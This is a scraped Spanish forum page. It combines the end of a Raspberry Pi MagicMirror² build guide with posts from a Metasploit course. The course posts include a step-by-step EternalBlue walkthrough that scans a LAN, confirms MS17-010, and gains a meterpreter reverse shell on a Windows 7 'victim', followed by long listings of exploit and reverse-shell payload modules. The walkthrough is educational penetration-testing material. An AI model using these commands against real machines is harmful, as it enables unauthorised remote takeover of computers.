Con el acrílico y la película ya cortados, fue necesario retirar las películas protectoras del acrílico y de la película espejo y efectuar la aplicación de la película espejo con la pantalla. Este proceso se ha efectuado con cuidado y para evitar la creación de burbujas de aire, así como dejar pequeñas partículas de polvo debajo de la película. Al final identificé bastantes burbujas de aire, las cuales retiré quirúrgicamente perforando las mismas con un alfil fino. Como pueden verificar el resultado no fue el mejor pues la película no llegó en las mejores condiciones habiendo sufrido bastante en el transporte. Sin embargo y teniendo en cuenta el propósito, lo aplicé en la misma.



Con el x-acto cortar dos tiras finas de cinta adhesiva de doble cara para poder pegar el acrílico preparado anteriormente en la pantalla.

https://pplware.sapo.pt/wp-content/uploads/2017/11/Ecra_fita_cola.jpg

Como la pantalla montada, podemos volver a montar el monitor en su capa exterior terminando así esta fase de construcción.



software:
Para este propósito decidí utilizar como base una distribución del sistema operativo linux, simple y ligera como el Raspbian Strech Lite.

En primer lugar es necesario descargar el mismo disponible en el sitio oficial. Después de la descarga de la distribución tenemos que colocarla en la tarjeta utilizando el método indicado en el artículo, cambiando sólo el archivo de la misma.

Una vez finalizado el proceso anterior, vamos a pasar a la configuración del sistema operativo, instalación y personalización de MagicMirror².

configuración:

Actualizar la distribución:

Código: [Seleccionar]
sudo apt-get update && sudo apt-get upgrade -y


Actualizar el firmware

Código: [Seleccionar]
sudo rpi-update


Instalación de los requisitos

Código: [Seleccionar]
sudo apt-get -y install xorg x11-xserver-utils chromium-browser git libgtk-3-0
Eliminar los archivos temporales de instalación

Código: [Seleccionar]
sudo apt-get clean
Instalar MagicMirror²

Código: [Seleccionar]
https://raw.githubusercontent.com/MichMich/MagicMirror/master/installers/raspberry.sh | bash


Después de la correcta instalación de MagicMirror² tendremos que parar la ejecución del mismo a través del comando

Código: [Seleccionar]
pm2 stop MagicMirror
Personalización del sistema operativo:

Abrir el archivo /etc/rc.local y agregar las líneas antes de la línea "exit 0":

Código: [Seleccionar]
iwconfig wlan0 power off
su -s /bin/bash -c "startx -- -nocursor" pi&

Estas líneas deshabilitar la administración de energía del controlador inalámbrico para evitar errores de sincronización y permitirá el inicio del escritorio con el usuario pi y sin el cursor del ratón, respectivamente.

Cambiar la línea “allowed_users=console” a “allowed_users=anybody” del archivo /etc/X11/Xwrapper.config

Abrir el archivo /home/pi/.xinitrc y añadir las siguientes líneas:

Código: [Seleccionar]
export DISPLAY=:0.0
xset s off
xset s noblank
xset -dpms
cd /home/pi/MagicMirror
node serveronly &
chromium-browser --noerrdialogs --kiosk --incognito http://localhost:8080

Estas líneas permitirán a MagicMirror² arrancar inmediatamente después de iniciar el sistema, sin el protector de pantalla activa y el control de energía de la pantalla.

Personalización del "Magic Mirror":

Gracias a la comunidad de MagicMirror2
 están disponibles muchos más módulos para poder agregar, sin embargo vamos a configurar los que están disponibles originalmente. Todas las configuraciones para estos módulos están disponibles en el fichero "/home/pi/MagicMirror/config/config.js" siendo necesario cambiarlo.

Información meteorológica:

Para obtener su información a través de la API es necesario registrarse en el sitio: https://home.openweathermap.org

Reemplace el campo "YOUR_OPENWEATHER_API_KEY" por la clave disponible en: https://home.openweathermap.org/api_keys

Es necesario también cambiar la identificación y el nombre de la ubicación, que pueden consultar en: http://www.openweathermap.org/help/city_list.txt

La configuración debe parecerse al siguiente ejemplo:

Código: [Seleccionar]
config: {
location: "Lisbon",
locationID: "2267057",  //ID from http://www.openweathermap.org/help/city_list.txt
appid: "YOUR_OPENWEATHER_API_KEY" //from https://home.openweathermap.org/api_keys
}

Calendário:

Para añadir el calendario simplemente cambiar la forma en que el campo de dirección URL con la dirección de un calendario en formato ICS, como el siguiente ejemplo actualizado con las fiestas portuguesas y una vía de ejemplo para el calendario de Google:

Código: [Seleccionar]
calendars: [
{
symbol: "calendar-check-o ",
url: "webcal://calendarr.com/portugal/ics/"
},
{
symbol: "calendar-check-o ",
url: "https://calendar.google.com/calendar/ical/MY_INFO.ics"
}
]

Noticias:

Para añadir una fuente de noticias basta con cambiar la ruta del campo url con la dirección de una fuente en el formato xml, según el siguiente ejemplo actualizado con las noticias de Pplware:

Código: [Seleccionar]
feeds: [
{
title: "New York Times",
url: "http://www.nytimes.com/services/xml/rss/nyt/HomePage.xml",
},
{
                title: "Pplware",
                        url: "https://pplware.sapo.pt/feed/"
                }
]

CSS:

Para optimizar el espacio disponible de la pantalla, es necesario cambiar el archivo “/home/pi/MagicMirror/css/custom.css” con las siguientes líneas:

Código: [Seleccionar]
body {
        margin:0px;
        position:unset;
 }

.region.bottom {
        bottom:3%;
}

.region.right{
        right:3%;
}

Esta imagen indica el problema que estaba teniendo y la solución después de cambiar el archivo CSS





Fuente: pplware.sapo.pt

16


En esta tercer parte vamos a conseguir un meterpreter con el famoso exploit ETERNALBLUE.

Dejare esto dos conceptos para que se entienda un poco mas.

SMB: Es un protocolo de red que permite compartir archivos, impresoras, etcétera, entre nodos de una red que usan sistema operativo Windows

CVE: Common Vulnerabilities and Exposures, “Vulnerabilidades y exposiciones comunes” Este es un estándar para nombrar vulnerabilidades de seguridad. CVE-YYYY-NNNN YYYY indica el año y NNNN indica el número de la vulnerabililocal.

ETERNALBLUE: Es un exploit de una vulnerabilidad del protocolo (SMB). Esta vulnerabilidad se indica mediante como CVE-2017-0144. Esta vulnerabilidad existe porque el servidor SMB versión 1 (SMBv1) maneja mal los paquetes especialmente diseñadas de ataque remotos y esto permite ejecutar código arbitrario.

El 8 de abril del 2017, TheShadowBroker público una gran arsenal de herramientas de hacking de la NSA. Lo cual lo puedes ver en GitHub


Este exploit solo ataca a sistema operativos Windows 7 y Windows server 2008. Lo extraordinario de este exploit es que no se necesita enviar un tipio de archivo “PAYLOAD” y espera que la víctima lo ejecute y pensar como engañar a la víctima con ingeniera social  para que ejecute dicho archivo, Bueno con este exploit es totalmente lo contrario no necesitas crear nada, solo necesita configurar algunos parámetros básicos y tendrás el control total de una máquina.

Estare simulando un ataque real.

Primero tenemos que identificar la víctima y para eso tenemos que ver que máquinas están conectado en nuestra red y para eso ocuparemos una herramienta que busque host vivos. Con la herramienta NETDISCOVER



Esta herramienta básicamente lo que hace es detectar los host que están conectado en nuestra red, Esta herramienta hace su búsqueda por medio de peticiones ARP.

Código: [Seleccionar]
netdiscover -i wlan0 -r 192.168.0.0/24
-i = La interfaz de red que estaremos utilizando, para ver nuestra interfaz ocupe ifconfig.

-r = El rango del escaneo.

Y como resultado no aparecerán todos los host conectado.



Como podrán ver tengo tres host:

192.168.0.1: sería el router
192.168.0.100: Maquina de la víctima
192.168.0.102: Un celular.

Ya una vez identificada la victima que sería la IP 192.168.0.100 por lo cual tenemos que saber si esa máquina es vulnerable o no, por lo cual ocuparemos nmap esta herramienta tiene script para escanear vulnerabilidades. El script que estaremos utilizando --script smb-vuln-ms17-010.nse y a la vez veremos qué sistema operativo es la máquina de la victima.

Código: [Seleccionar]
nmap -sC -sV -p 445 --script smb-vuln-ms17-010.nse 192.168.0.100
Y no aparecerá esto.



Como podemos ver el resultado nos dice que es un Windows 7 y que el equipo es VULNERABLE. Ahora nos queda ejecutar nuestro metasploit y buscar enternablue, para eso ocuparemos el comando search.

Código: [Seleccionar]
search eternablue


Nos aparecerá dos módulos que sería el auxiliar que es lo mismo que hicimos en nmap para identificar si la máquina de la víctima es vulnerable. Y el otro modulo es el exploit.

Para ingresar al módulo del exploit de enternablue se ocupar el comando use

Código: [Seleccionar]
use exploit/windows/smb/ms17_010_eternalblue


Ahora nos falta setear y colocaremos la IP de nuestra victima

Código: [Seleccionar]
set RHOST 192.168.0.100
Ahora crearemos un payload para obtener el meterpreter. Si nosotros no creamos el payload al momento de atacar como resultado obtendremos el cmd de la máquina de la víctima y en cambio sí obtenernos un meterpreter podemos hacer un fin de cosas como descarga archivo, subir archivos, capturar pantalla, etc….

Código: [Seleccionar]
set payload windows/x64/meterpreter/reverse_tcp
Y por finalizar nos queda LHOST que sería la IP de nuestra máquina. Con el comando ifconfig sabremos cual es nuestra IP.



En mi caso la IP que tengo seria 192.168.0.101   

Código: [Seleccionar]
set LHOST 192.168.0.101
Escribimos show options    



Ahora nos falta ejecutar para eso escribimos:   

Código: [Seleccionar]
exploit
Y listo nuestro exploit se estará ejecutado y obtendremos el meterpreter que tanto deseamos.



Para finalizar el post si escriben help podrán ver todo el comando del meterpreter. El siguiente post estaré hablado todo el comando de meterpreter.


Curso Metasploit - Part 1 - Hablemos sobre metasploit
Curso Metasploit - Part. 2.1 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
Curso Metasploit - Part. 4 - Definiciones Comandos de meterpreter
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 5 – Hablemos de msfvenom


17
Hacking / Curso Metasploit - Part. 2.2 - Comandos de metasploit
« en: Noviembre 22, 2017, 12:43:47 am »


En esta es la continuación de la segunda parte de los comandos.

Module Commands - Comandos de módulo

Esto son los comando que podemos ocupar en los módulo

advanced: Muestra opciones avanzadas para uno o más módulos.

back: Volver atrás.
edit: Con este comando puedes editar el código fuente del módulo que estas usando. Con el editor Vim.
info: Te muestra toda la información del módulo en que estas.

loadpath: El comando loadpath cargará un árbol de módulos de terceros. Es como cargar un parche.
options: Este comando es más conocido como show options ósea si escribes show options o solo options te aparecerá lo mismo. Este comando te muestra las opciones del módulo que estés ocupando.

popm: Apaga el último módulo de la pila y lo activa.
previous: Establece el módulo previamente cargado como el módulo actual
reload_all: Recarga todos los módulos de todas las rutas.
search: Busca por nombre y descripciones de los módulos. Ósea si quiero buscar android como resultado me saldrá todos los módulos como exploit aux etc... Sobre de android. Con detalles como fecha cuando salieron, los Rank, si son efectivo y una pequeña descripción.
Código: [Seleccionar]
msf > search android
Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal     Android Browser RCE Through Google Play Store XFO
   auxiliary/dos/android/android_stock_browser_iframe         2012-12-01       normal     Android Stock Browser Iframe DOS
   auxiliary/gather/android_browser_file_theft                                 normal     Android Browser File Theft
   auxiliary/gather/android_browser_new_tab_cookie_theft                       normal     Android Browser "Open in New Tab" Cookie Theft
   auxiliary/gather/android_htmlfileprovider                                   normal     Android Content Provider File Disclosure
   auxiliary/gather/android_object_tag_webview_uxss           2014-10-04       normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/android_stock_browser_uxss                                 normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/firefox_pdfjs_file_theft                                   normal     Firefox PDF.js Browser File Theft
   auxiliary/scanner/sip/sipdroid_ext_enum                                     normal     SIPDroid Extension Grabber
   auxiliary/server/android_browsable_msf_launch                               normal     Android Meterpreter Browsable Launcher
   auxiliary/server/android_mercury_parseuri                                   normal     Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability
   exploit/android/adb/adb_server_exec                        2016-01-01       excellent  Android ADB Debug Server Remote Payload Execution
   exploit/android/browser/samsung_knox_smdm_url              2014-11-12       excellent  Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/stagefright_mp4_tx3g_64bit         2015-08-13       normal     Android Stagefright MP4 tx3g Integer Overflow
   exploit/android/browser/webview_addjavascriptinterface     2012-12-21       excellent  Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface   2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                        2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/android/local/put_user_vroot                       2013-09-06       excellent  Android get_user/put_user Exploit
   exploit/multi/local/allwinner_backdoor                     2016-04-30       excellent  Allwinner 3.4 Legacy Kernel Local Privilege Escalation
   payload/android/meterpreter/reverse_http                                    normal     Android Meterpreter, Android Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                   normal     Android Meterpreter, Android Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                     normal     Android Meterpreter, Android Reverse TCP Stager
   payload/android/meterpreter_reverse_http                                    normal     Android Meterpreter Shell, Reverse HTTP Inline
   payload/android/meterpreter_reverse_https                                   normal     Android Meterpreter Shell, Reverse HTTPS Inline
   payload/android/meterpreter_reverse_tcp                                     normal     Android Meterpreter Shell, Reverse TCP Inline
   payload/android/shell/reverse_http                                          normal     Command Shell, Android Reverse HTTP Stager
   payload/android/shell/reverse_https                                         normal     Command Shell, Android Reverse HTTPS Stager
   payload/android/shell/reverse_tcp                                           normal     Command Shell, Android Reverse TCP Stager
   post/android/capture/screen                                                 normal     Android Screen Capture
   post/android/manage/remove_lock                            2013-10-11       normal     Android Settings Remove Device Locks (4.0-4.3)
   post/android/manage/remove_lock_root                                        normal     Android Root Remove Device Locks (root)
show: Muestra módulos de un tipo dado, o todos los módulos. Hay una serie de forma de ocupar show que ahora se le estaré mostrando.

Si escribimos show en la msfconsole se mostrara todos los módulos dentro de metasploit.No voy a mostrar todo en los resultado por que el post tiene limites de palabras y no me dejas colocar todos los resultados.

Código: [Seleccionar]
msf > show

Encoders
========

   Name                          Disclosure Date  Rank       Description
   ----                          ---------------  ----       -----------
   cmd/echo                                       good       Echo Command Encoder
   cmd/generic_sh                                 manual     Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                        low        Generic ${IFS} Substitution Command Encoder
   cmd/perl                                       normal     Perl Command Encoder
 
   
NOP Generators
==============

   Name             Disclosure Date  Rank    Description
   ----             ---------------  ----    -----------
   aarch64/simple                    normal  Simple
   armle/simple                      normal  Simple
   mipsbe/better                     normal  Better

Exploits
========

   Name                                                              Disclosure Date  Rank       Description
   ----                                                              ---------------  ----       -----------
   windows/ssh/putty_msg_debug                                       2002-12-16       normal     PuTTY Buffer Overflow
   windows/ssh/securecrt_ssh1                                        2002-07-23       average    SecureCRT SSH1 Buffer Overflow
   windows/ssh/sysax_ssh_username                                    2012-02-27       normal     Sysax 5.53 SSH Username Buffer Overflow
   windows/ssl/ms04_011_pct                                          2004-04-13       average    MS04-011 Microsoft Private Communications Transport Overflow
   windows/telnet/gamsoft_telsrv_username                            2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
   windows/telnet/goodtech_telnet                                    2005-03-15       average    GoodTech Telnet Server Buffer Overflow
   windows/tftp/attftp_long_filename                                 2006-11-27       average    Allied Telesyn TFTP Server 1.9 Long Filename Overflow
   windows/tftp/distinct_tftp_traversal                              2012-04-08       excellent  Distinct TFTP 3.10 Writable Directory Traversal Execution
   windows/tftp/dlink_long_filename                                  2007-03-12       good       D-Link TFTP 1.0 Long Filename Buffer Overflow
   windows/tftp/futuresoft_transfermode                              2005-05-31       average    FutureSoft TFTP Server 2000 Transfer-Mode Overflow
   windows/tftp/netdecision_tftp_traversal                           2009-05-16       excellent  NetDecision 4.2 TFTP Writable Directory Traversal Execution
   windows/tftp/opentftp_error_code                                  2008-07-05       average    OpenTFTP SP 1.4 Error Packet Overflow
   windows/tftp/quick_tftp_pro_mode                                  2008-03-27       good       Quick FTP Pro 2.1 Transfer-Mode Overflow
   windows/tftp/tftpd32_long_filename                                2002-11-19       average    TFTPD32 Long Filename Buffer Overflow

Payloads
========

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                               normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                                              normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                                               normal  AIX execve Shell for inetd
   aix/ppc/shell_reverse_tcp                                            normal  AIX Command Shell, Reverse TCP Inline
   android/meterpreter/reverse_http                                     normal  Android Meterpreter, Android Reverse HTTP Stager
   android/meterpreter/reverse_https                                    normal  Android Meterpreter, Android Reverse HTTPS Stager
   android/meterpreter/reverse_tcp                                      normal  Android Meterpreter, Android Reverse TCP Stager
   android/meterpreter_reverse_http                                     normal  Android Meterpreter Shell, Reverse HTTP Inline
   android/meterpreter_reverse_https                                    normal  Android Meterpreter Shell, Reverse HTTPS Inline
   android/meterpreter_reverse_tcp                                      normal  Android Meterpreter Shell, Reverse TCP Inline
   android/shell/reverse_http                                           normal  Command Shell, Android Reverse HTTP Stager
   android/shell/reverse_https                                          normal  Command Shell, Android Reverse HTTPS Stager

Auxiliary
=========

   Name                                                           Disclosure Date  Rank    Description
   ----                                                           ---------------  ----    -----------
   admin/mssql/mssql_sql                                                           normal  Microsoft SQL Server Generic Query
   admin/mssql/mssql_sql_file                                                      normal  Microsoft SQL Server Generic Query from File
   admin/mysql/mysql_enum                                                          normal  MySQL Enumeration Module
   admin/mysql/mysql_sql                                                           normal  MySQL SQL Generic Query
   admin/natpmp/natpmp_map                                                         normal  NAT-PMP Port Mapper
   admin/netbios/netbios_spoof                                                     normal  NetBIOS Response Brute Force Spoof (Direct)
   dos/http/rails_json_float_dos                                  2013-11-22       normal  Ruby on Rails JSON Processor Floating Point Heap Overflow DoS
   dos/http/sonicwall_ssl_format                                  2009-05-29       normal  SonicWALL SSL-VPN Format String Vulnerability
   dos/http/webrick_regex                                         2008-08-08       normal  Ruby WEBrick::HTTP::DefaultFileHandler DoS
   dos/http/wordpress_directory_traversal_dos                                      normal  WordPress Traversal Directory DoS
   dos/http/wordpress_long_password_dos                           2014-11-20       normal  WordPress Long Password DoS
   dos/http/wordpress_xmlrpc_dos                                  2014-08-06       normal  Wordpress XMLRPC DoS
   dos/mdns/avahi_portzero                                        2008-11-14       normal  Avahi Source Port 0 DoS
   dos/misc/dopewars                                              2009-10-05       normal  Dopewars Denial of Service
   scanner/http/trace_axd                                                          normal  HTTP trace.axd Content Scanner
   scanner/http/typo3_bruteforce                                                   normal  Typo3 Login Bruteforcer
   scanner/http/vcms_login                                                         normal  V-CMS Login Utility


Igual podemos ver por separamos con escribir con los siguientes comando - show auxiliary - show exploits - show payloads - show encoders y show nops.

Código: [Seleccionar]
show payloads
Código: [Seleccionar]
msf > show payloads

Payloads
========

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                               normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                                              normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                                               normal  AIX execve Shell for inetd
   aix/ppc/shell_reverse_tcp                                            normal  AIX Command Shell, Reverse TCP Inline
   android/meterpreter/reverse_http                                     normal  Android Meterpreter, Android Reverse HTTP Stager
   android/meterpreter/reverse_https                                    normal  Android Meterpreter, Android Reverse HTTPS Stager
   android/meterpreter/reverse_tcp                                      normal  Android Meterpreter, Android Reverse TCP Stager
   android/meterpreter_reverse_http                                     normal  Android Meterpreter Shell, Reverse HTTP Inline
   android/meterpreter_reverse_https                                    normal  Android Meterpreter Shell, Reverse HTTPS Inline
   android/meterpreter_reverse_tcp                                      normal  Android Meterpreter Shell, Reverse TCP Inline
   android/shell/reverse_http                                           normal  Command Shell, Android Reverse HTTP Stager
   android/shell/reverse_https                                          normal  Command Shell, Android Reverse HTTPS Stager
   android/shell/reverse_tcp                                            normal  Command Shell, Android Reverse TCP Stager
   bsd/sparc/shell_bind_tcp                                             normal  BSD Command Shell, Bind TCP Inline
   bsd/sparc/shell_reverse_tcp                                          normal  BSD Command Shell, Reverse TCP Inline
   bsd/x64/exec                                                         normal  BSD x64 Execute Command
   bsd/x64/shell_bind_ipv6_tcp                                          normal  BSD x64 Command Shell, Bind TCP Inline (IPv6)
   bsd/x64/shell_bind_tcp                                               normal  BSD x64 Shell Bind TCP
   bsd/x64/shell_bind_tcp_small                                         normal  BSD x64 Command Shell, Bind TCP Inline
   bsd/x64/shell_reverse_ipv6_tcp                                       normal  BSD x64 Command Shell, Reverse TCP Inline (IPv6)
   bsd/x64/shell_reverse_tcp                                            normal  BSD x64 Shell Reverse TCP
   bsd/x64/shell_reverse_tcp_small                                      normal  BSD x64 Command Shell, Reverse TCP Inline
   bsd/x86/exec                                                         normal  BSD Execute Command
   bsd/x86/metsvc_bind_tcp                                              normal  FreeBSD Meterpreter Service, Bind TCP
   bsd/x86/metsvc_reverse_tcp                                           normal  FreeBSD Meterpreter Service, Reverse TCP Inline
   bsd/x86/shell/bind_ipv6_tcp                                          normal  BSD Command Shell, Bind TCP Stager (IPv6)
   bsd/x86/shell/bind_tcp                                               normal  BSD Command Shell, Bind TCP Stager
   bsd/x86/shell/find_tag                                               normal  BSD Command Shell, Find Tag Stager
   bsd/x86/shell/reverse_ipv6_tcp                                       normal  BSD Command Shell, Reverse TCP Stager (IPv6)
   bsd/x86/shell/reverse_tcp                                            normal  BSD Command Shell, Reverse TCP Stager
   bsd/x86/shell_bind_tcp                                               normal  BSD Command Shell, Bind TCP Inline
   bsd/x86/shell_bind_tcp_ipv6                                          normal  BSD Command Shell, Bind TCP Inline (IPv6)
   bsd/x86/shell_find_port                                              normal  BSD Command Shell, Find Port Inline
   bsd/x86/shell_find_tag                                               normal  BSD Command Shell, Find Tag Inline
   bsd/x86/shell_reverse_tcp                                            normal  BSD Command Shell, Reverse TCP Inline
   bsd/x86/shell_reverse_tcp_ipv6                                       normal  BSD Command Shell, Reverse TCP Inline (IPv6)
   bsdi/x86/shell/bind_tcp                                              normal  BSDi Command Shell, Bind TCP Stager
   bsdi/x86/shell/reverse_tcp                                           normal  BSDi Command Shell, Reverse TCP Stager
   bsdi/x86/shell_bind_tcp                                              normal  BSDi Command Shell, Bind TCP Inline
   bsdi/x86/shell_find_port                                             normal  BSDi Command Shell, Find Port Inline
   bsdi/x86/shell_reverse_tcp                                           normal  BSDi Command Shell, Reverse TCP Inline
   cmd/mainframe/apf_privesc_jcl                                        normal  JCL to Escalate Privileges
   cmd/mainframe/bind_shell_jcl                                         normal  Z/OS (MVS) Command Shell, Bind TCP
   cmd/mainframe/generic_jcl                                            normal  Generic JCL Test for Mainframe Exploits
   cmd/mainframe/reverse_shell_jcl                                      normal  Z/OS (MVS) Command Shell, Reverse TCP
   cmd/unix/bind_awk                                                    normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                                  normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                                    normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                                 normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                                          normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_nodejs                                                 normal  Unix Command Shell, Bind TCP (via nodejs)
   cmd/unix/bind_perl                                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_r                                                      normal  Unix Command Shell, Bind TCP (via R)
   cmd/unix/bind_ruby                                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                                    normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                                     normal  Unix Command, Generic Command Execution
   cmd/unix/interact                                                    normal  Unix Command, Interact with Established Connection
   cmd/unix/reverse                                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                                 normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_bash                                                normal  Unix Command Shell, Reverse TCP (/dev/tcp)
   cmd/unix/reverse_bash_telnet_ssl                                     normal  Unix Command Shell, Reverse TCP SSL (telnet)
   cmd/unix/reverse_lua                                                 normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_ncat_ssl                                            normal  Unix Command Shell, Reverse TCP (via ncat)
   cmd/unix/reverse_netcat                                              normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_nodejs                                              normal  Unix Command Shell, Reverse TCP (via nodejs)
   cmd/unix/reverse_openssl                                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                                             normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                                              normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                                          normal  Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_r                                                   normal  Unix Command Shell, Reverse TCP (via R)
   cmd/unix/reverse_ruby                                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                                 normal  Unix Command Shell, Reverse TCP (via Zsh)
   cmd/windows/adduser                                                  normal  Windows Execute net user /ADD CMD
   cmd/windows/bind_lua                                                 normal  Windows Command Shell, Bind TCP (via Lua)
   cmd/windows/bind_perl                                                normal  Windows Command Shell, Bind TCP (via Perl)
   cmd/windows/bind_perl_ipv6                                           normal  Windows Command Shell, Bind TCP (via perl) IPv6
   cmd/windows/bind_ruby                                                normal  Windows Command Shell, Bind TCP (via Ruby)
   cmd/windows/download_eval_vbs                                        normal  Windows Executable Download and Evaluate VBS
   cmd/windows/download_exec_vbs                                        normal  Windows Executable Download and Execute (via .vbs)
   cmd/windows/generic                                                  normal  Windows Command, Generic Command Execution
   cmd/windows/powershell_bind_tcp                                      normal  Windows Interactive Powershell Session, Bind TCP
   cmd/windows/powershell_reverse_tcp                                   normal  Windows Interactive Powershell Session, Reverse TCP
   cmd/windows/reverse_lua                                              normal  Windows Command Shell, Reverse TCP (via Lua)
   cmd/windows/reverse_perl                                             normal  Windows Command, Double Reverse TCP Connection (via Perl)
   cmd/windows/reverse_powershell                                       normal  Windows Command Shell, Reverse TCP (via Powershell)
   cmd/windows/reverse_ruby                                             normal  Windows Command Shell, Reverse TCP (via Ruby)
   firefox/exec                                                         normal  Firefox XPCOM Execute Command
   firefox/shell_bind_tcp                                               normal  Command Shell, Bind TCP (via Firefox XPCOM script)
   firefox/shell_reverse_tcp                                            normal  Command Shell, Reverse TCP (via Firefox XPCOM script)
   generic/custom                                                       normal  Custom Payload
   generic/debug_trap                                                   normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                   normal  Generic x86 Tight Loop
   java/jsp_shell_bind_tcp                                              normal  Java JSP Command Shell, Bind TCP Inline
   java/jsp_shell_reverse_tcp                                           normal  Java JSP Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                                            normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                                        normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                                       normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                                         normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                                                  normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                                               normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                                               normal  Java Command Shell, Reverse TCP Inline
   linux/aarch64/meterpreter/reverse_tcp                                normal  Linux Meterpreter, Reverse TCP Stager
   linux/aarch64/meterpreter_reverse_http                               normal  Linux Meterpreter, Reverse HTTP Inline
   linux/aarch64/meterpreter_reverse_https                              normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/aarch64/meterpreter_reverse_tcp                                normal  Linux Meterpreter, Reverse TCP Inline
   linux/aarch64/shell/reverse_tcp                                      normal  Linux dup2 Command Shell, Reverse TCP Stager
   linux/aarch64/shell_reverse_tcp                                      normal  Linux Command Shell, Reverse TCP Inline
   linux/armbe/meterpreter_reverse_http                                 normal  Linux Meterpreter, Reverse HTTP Inline
   linux/armbe/meterpreter_reverse_https                                normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/armbe/meterpreter_reverse_tcp                                  normal  Linux Meterpreter, Reverse TCP Inline
   linux/armbe/shell_bind_tcp                                           normal  Linux ARM Big Endian Command Shell, Bind TCP Inline
   linux/armle/adduser                                                  normal  Linux Add User
   linux/armle/exec                                                     normal  Linux Execute Command
   linux/armle/meterpreter/bind_tcp                                     normal  Linux Meterpreter, Bind TCP Stager
   linux/armle/meterpreter/reverse_tcp                                  normal  Linux Meterpreter, Reverse TCP Stager
   linux/armle/meterpreter_reverse_http                                 normal  Linux Meterpreter, Reverse HTTP Inline
   linux/armle/meterpreter_reverse_https                                normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/armle/meterpreter_reverse_tcp                                  normal  Linux Meterpreter, Reverse TCP Inline
   linux/armle/shell/bind_tcp                                           normal  Linux dup2 Command Shell, Bind TCP Stager
   linux/armle/shell/reverse_tcp                                        normal  Linux dup2 Command Shell, Reverse TCP Stager
   linux/armle/shell_bind_tcp                                           normal  Linux Command Shell, Reverse TCP Inline
   linux/armle/shell_reverse_tcp                                        normal  Linux Command Shell, Reverse TCP Inline
   linux/mips64/meterpreter_reverse_http                                normal  Linux Meterpreter, Reverse HTTP Inline
   linux/mips64/meterpreter_reverse_https                               normal  Linux Meterpreter, Reverse HTTPS Inline
